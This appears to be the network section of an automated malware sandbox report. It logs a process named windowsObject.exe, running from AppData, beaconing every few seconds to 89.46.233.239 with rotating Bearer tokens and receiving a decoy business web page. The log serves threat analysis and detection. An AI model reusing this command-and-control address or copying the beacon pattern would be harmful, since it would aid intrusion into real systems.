          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 42 72 69 67 68 74 46 75 74 75 72 65 20 44 69 67 69 74 61 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 34 66 34 66 34 3b [TRUNCATED]
          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>BrightFuture Digital</title> <style> body { font-family: Arial, sans-serif; margin: 0; padding: 0; background-color: #f4f4f4; } header { background-color: #2C3E50; color: #fff; padding: 1rem; text-align: center; } nav { display: flex; justify-content: center; background-color: #34495E; } nav a { color: white; padding: 1rem; text-decoration: none; } nav a:hover { background-color: #2C3E50; } main { padding: 2rem; margin: 2rem; background-color: #fff; border-radius: 5px; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); } [TRUNCATED]


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          2192.168.2.44972389.46.233.239104437368C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe
          TimestampBytes transferredDirectionData
          Mar 12, 2025 17:37:52.548002005 CET521OUTGET /resource HTTP/1.1
          Host: 89.46.233.239
          Host: Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
          Authorization: Bearer SLTGCoiLjGhLcClIKQVYFAFNVW0oDBQJTSkJEExQQ
          Mar 12, 2025 17:37:53.477308035 CET1236INHTTP/1.0 200 OK
          Date: Wed, 12 Mar 2025 16:37:53 GMT
          Server: 89.46.233.239
          Content-Type: text/html; charset=utf-8
          Content-Length: 2739
          Connection: close
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 42 72 69 67 68 74 46 75 74 75 72 65 20 44 69 67 69 74 61 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 34 66 34 66 34 3b [TRUNCATED]
          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>BrightFuture Digital</title> <style> body { font-family: Arial, sans-serif; margin: 0; padding: 0; background-color: #f4f4f4; } header { background-color: #2C3E50; color: #fff; padding: 1rem; text-align: center; } nav { display: flex; justify-content: center; background-color: #34495E; } nav a { color: white; padding: 1rem; text-decoration: none; } nav a:hover { background-color: #2C3E50; } main { padding: 2rem; margin: 2rem; background-color: #fff; border-radius: 5px; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); } [TRUNCATED]


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          3192.168.2.44972489.46.233.239104437368C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe
          TimestampBytes transferredDirectionData
          Mar 12, 2025 17:37:58.610642910 CET521OUTGET /resource HTTP/1.1
          Host: 89.46.233.239
          Host: Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
          Authorization: Bearer OLSPCoiLjThLcClBKQVYFAFNVW0oDBQJTSkJEExQQ
          Mar 12, 2025 17:37:59.484772921 CET160INHTTP/1.0 200 OK
          Date: Wed, 12 Mar 2025 16:37:59 GMT
          Server: 89.46.233.239
          Content-Type: text/html; charset=utf-8
          Content-Length: 2739
          Connection: close


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          4192.168.2.44972689.46.233.239104437368C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe
          TimestampBytes transferredDirectionData
          Mar 12, 2025 17:38:04.610944986 CET521OUTGET /resource HTTP/1.1
          Host: 89.46.233.239
          Host: Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
          Authorization: Bearer RLNCCoiLjLhLcClGKQVYFAFNVW0oDBQJTSkJEExQQ
          Mar 12, 2025 17:38:05.496951103 CET1236INHTTP/1.0 200 OK
          Date: Wed, 12 Mar 2025 16:38:05 GMT
          Server: 89.46.233.239
          Content-Type: text/html; charset=utf-8
          Content-Length: 2739
          Connection: close
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 42 72 69 67 68 74 46 75 74 75 72 65 20 44 69 67 69 74 61 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 34 66 34 66 34 3b [TRUNCATED]
          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>BrightFuture Digital</title> <style> body { font-family: Arial, sans-serif; margin: 0; padding: 0; background-color: #f4f4f4; } header { background-color: #2C3E50; color: #fff; padding: 1rem; text-align: center; } nav { display: flex; justify-content: center; background-color: #34495E; } nav a { color: white; padding: 1rem; text-decoration: none; } nav a:hover { background-color: #2C3E50; } main { padding: 2rem; margin: 2rem; background-color: #fff; border-radius: 5px; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); } [TRUNCATED]


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          5192.168.2.44972789.46.233.239104437368C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe
          TimestampBytes transferredDirectionData
          Mar 12, 2025 17:38:10.625745058 CET521OUTGET /resource HTTP/1.1
          Host: 89.46.233.239
          Host: Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
          Authorization: Bearer MLCNCoiLjJhLcClVKQVYFAFNVW0oDBQJTSkJEExQQ
          Mar 12, 2025 17:38:11.492712975 CET160INHTTP/1.0 200 OK
          Date: Wed, 12 Mar 2025 16:38:11 GMT
          Server: 89.46.233.239
          Content-Type: text/html; charset=utf-8
          Content-Length: 2739
          Connection: close


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          6192.168.2.44972889.46.233.239104437368C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe
          TimestampBytes transferredDirectionData
          Mar 12, 2025 17:38:16.625381947 CET521OUTGET /resource HTTP/1.1
          Host: 89.46.233.239
          Host: Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
          Authorization: Bearer MLLQCoiLjChLcClBKQVYFAFNVW0oDBQJTSkJEExQQ
          Mar 12, 2025 17:38:17.503053904 CET1236INHTTP/1.0 200 OK
          Date: Wed, 12 Mar 2025 16:38:17 GMT
          Server: 89.46.233.239
          Content-Type: text/html; charset=utf-8
          Content-Length: 2739
          Connection: close
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 42 72 69 67 68 74 46 75 74 75 72 65 20 44 69 67 69 74 61 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 34 66 34 66 34 3b [TRUNCATED]
          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>BrightFuture Digital</title> <style> body { font-family: Arial, sans-serif; margin: 0; padding: 0; background-color: #f4f4f4; } header { background-color: #2C3E50; color: #fff; padding: 1rem; text-align: center; } nav { display: flex; justify-content: center; background-color: #34495E; } nav a { color: white; padding: 1rem; text-decoration: none; } nav a:hover { background-color: #2C3E50; } main { padding: 2rem; margin: 2rem; background-color: #fff; border-radius: 5px; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); } [TRUNCATED]


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          7192.168.2.44972989.46.233.239104437368C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe
          TimestampBytes transferredDirectionData
          Mar 12, 2025 17:38:22.736578941 CET521OUTGET /resource HTTP/1.1
          Host: 89.46.233.239
          Host: Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
          Authorization: Bearer FLCLCoiLjThLcClYKQVYFAFNVW0oDBQJTSkJEExQQ
          Mar 12, 2025 17:38:23.601264954 CET160INHTTP/1.0 200 OK
          Date: Wed, 12 Mar 2025 16:38:23 GMT
          Server: 89.46.233.239
          Content-Type: text/html; charset=utf-8
          Content-Length: 2739
          Connection: close


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          8192.168.2.44973089.46.233.239104437368C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe
          TimestampBytes transferredDirectionData
          Mar 12, 2025 17:38:28.736511946 CET521OUTGET /resource HTTP/1.1
          Host: 89.46.233.239
          Host: Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
          Authorization: Bearer MLHZCoiLjGhLcClIKQVYFAFNVW0oDBQJTSkJEExQQ
          Mar 12, 2025 17:38:29.609715939 CET1236INHTTP/1.0 200 OK
          Date: Wed, 12 Mar 2025 16:38:29 GMT
          Server: 89.46.233.239
          Content-Type: text/html; charset=utf-8
          Content-Length: 2739
          Connection: close
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 42 72 69 67 68 74 46 75 74 75 72 65 20 44 69 67 69 74 61 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 34 66 34 66 34 3b [TRUNCATED]
          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>BrightFuture Digital</title> <style> body { font-family: Arial, sans-serif; margin: 0; padding: 0; background-color: #f4f4f4; } header { background-color: #2C3E50; color: #fff; padding: 1rem; text-align: center; } nav { display: flex; justify-content: center; background-color: #34495E; } nav a { color: white; padding: 1rem; text-decoration: none; } nav a:hover { background-color: #2C3E50; } main { padding: 2rem; margin: 2rem; background-color: #fff; border-radius: 5px; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); } [TRUNCATED]


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          9192.168.2.44973189.46.233.239104437368C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe
          TimestampBytes transferredDirectionData
          Mar 12, 2025 17:38:34.735253096 CET521OUTGET /resource HTTP/1.1
          Host: 89.46.233.239
          Host: Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
          Authorization: Bearer ILKGCoiLjVhLcClFKQVYFAFNVW0oDBQJTSkJEExQQ
          Mar 12, 2025 17:38:35.607688904 CET1236INHTTP/1.0 200 OK
          Date: Wed, 12 Mar 2025 16:38:35 GMT
          Server: 89.46.233.239
          Content-Type: text/html; charset=utf-8
          Content-Length: 2739
          Connection: close
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 42 72 69 67 68 74 46 75 74 75 72 65 20 44 69 67 69 74 61 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 34 66 34 66 34 3b [TRUNCATED]
          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>BrightFuture Digital</title> <style> body { font-family: Arial, sans-serif; margin: 0; padding: 0; background-color: #f4f4f4; } header { background-color: #2C3E50; color: #fff; padding: 1rem; text-align: center; } nav { display: flex; justify-content: center; background-color: #34495E; } nav a { color: white; padding: 1rem; text-decoration: none; } nav a:hover { background-color: #2C3E50; } main { padding: 2rem; margin: 2rem; background-color: #fff; border-radius: 5px; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); } [TRUNCATED]


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          10192.168.2.44973289.46.233.239104437368C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe
          TimestampBytes transferredDirectionData
          Mar 12, 2025 17:38:40.737560034 CET521OUTGET /resource HTTP/1.1
          Host: 89.46.233.239
          Host: Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
          Authorization: Bearer ELVHCoiLjVhLcClSKQVYFAFNVW0oDBQJTSkJEExQQ
          Mar 12, 2025 17:38:41.610940933 CET160INHTTP/1.0 200 OK
          Date: Wed, 12 Mar 2025 16:38:41 GMT
          Server: 89.46.233.239
          Content-Type: text/html; charset=utf-8
          Content-Length: 2739
          Connection: close


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          11192.168.2.44973389.46.233.239104437368C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe
          TimestampBytes transferredDirectionData
          Mar 12, 2025 17:38:47.190242052 CET521OUTGET /resource HTTP/1.1
          Host: 89.46.233.239
          Host: Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
          Authorization: Bearer ULGLCoiLjEhLcClOKQVYFAFNVW0oDBQJTSkJEExQQ
          Mar 12, 2025 17:38:47.416965961 CET521OUTGET /resource HTTP/1.1
          Host: 89.46.233.239
          Host: Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
          Authorization: Bearer ULGLCoiLjEhLcClOKQVYFAFNVW0oDBQJTSkJEExQQ
          Mar 12, 2025 17:38:47.729353905 CET521OUTGET /resource HTTP/1.1
          Host: 89.46.233.239
          Host: Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
          Authorization: Bearer ULGLCoiLjEhLcClOKQVYFAFNVW0oDBQJTSkJEExQQ
          Mar 12, 2025 17:38:49.117772102 CET1236INHTTP/1.0 200 OK
          Date: Wed, 12 Mar 2025 16:38:49 GMT
          Server: 89.46.233.239
          Content-Type: text/html; charset=utf-8
          Content-Length: 2739
          Connection: close
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 42 72 69 67 68 74 46 75 74 75 72 65 20 44 69 67 69 74 61 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 34 66 34 66 34 3b [TRUNCATED]
          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>BrightFuture Digital</title> <style> body { font-family: Arial, sans-serif; margin: 0; padding: 0; background-color: #f4f4f4; } header { background-color: #2C3E50; color: #fff; padding: 1rem; text-align: center; } nav { display: flex; justify-content: center; background-color: #34495E; } nav a { color: white; padding: 1rem; text-decoration: none; } nav a:hover { background-color: #2C3E50; } main { padding: 2rem; margin: 2rem; background-color: #fff; border-radius: 5px; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); } [TRUNCATED]


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          12192.168.2.44973489.46.233.239104437368C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe
          TimestampBytes transferredDirectionData
          Mar 12, 2025 17:38:54.250559092 CET521OUTGET /resource HTTP/1.1
          Host: 89.46.233.239
          Host: Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
          Authorization: Bearer ZLYPCoiLjZhLcClVKQVYFAFNVW0oDBQJTSkJEExQQ
          Mar 12, 2025 17:38:55.144752979 CET160INHTTP/1.0 200 OK
          Date: Wed, 12 Mar 2025 16:38:55 GMT
          Server: 89.46.233.239
          Content-Type: text/html; charset=utf-8
          Content-Length: 2739
          Connection: close


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          13192.168.2.44973589.46.233.239104437368C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe
          TimestampBytes transferredDirectionData
          Mar 12, 2025 17:39:00.281969070 CET521OUTGET /resource HTTP/1.1
          Host: 89.46.233.239
          Host: Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
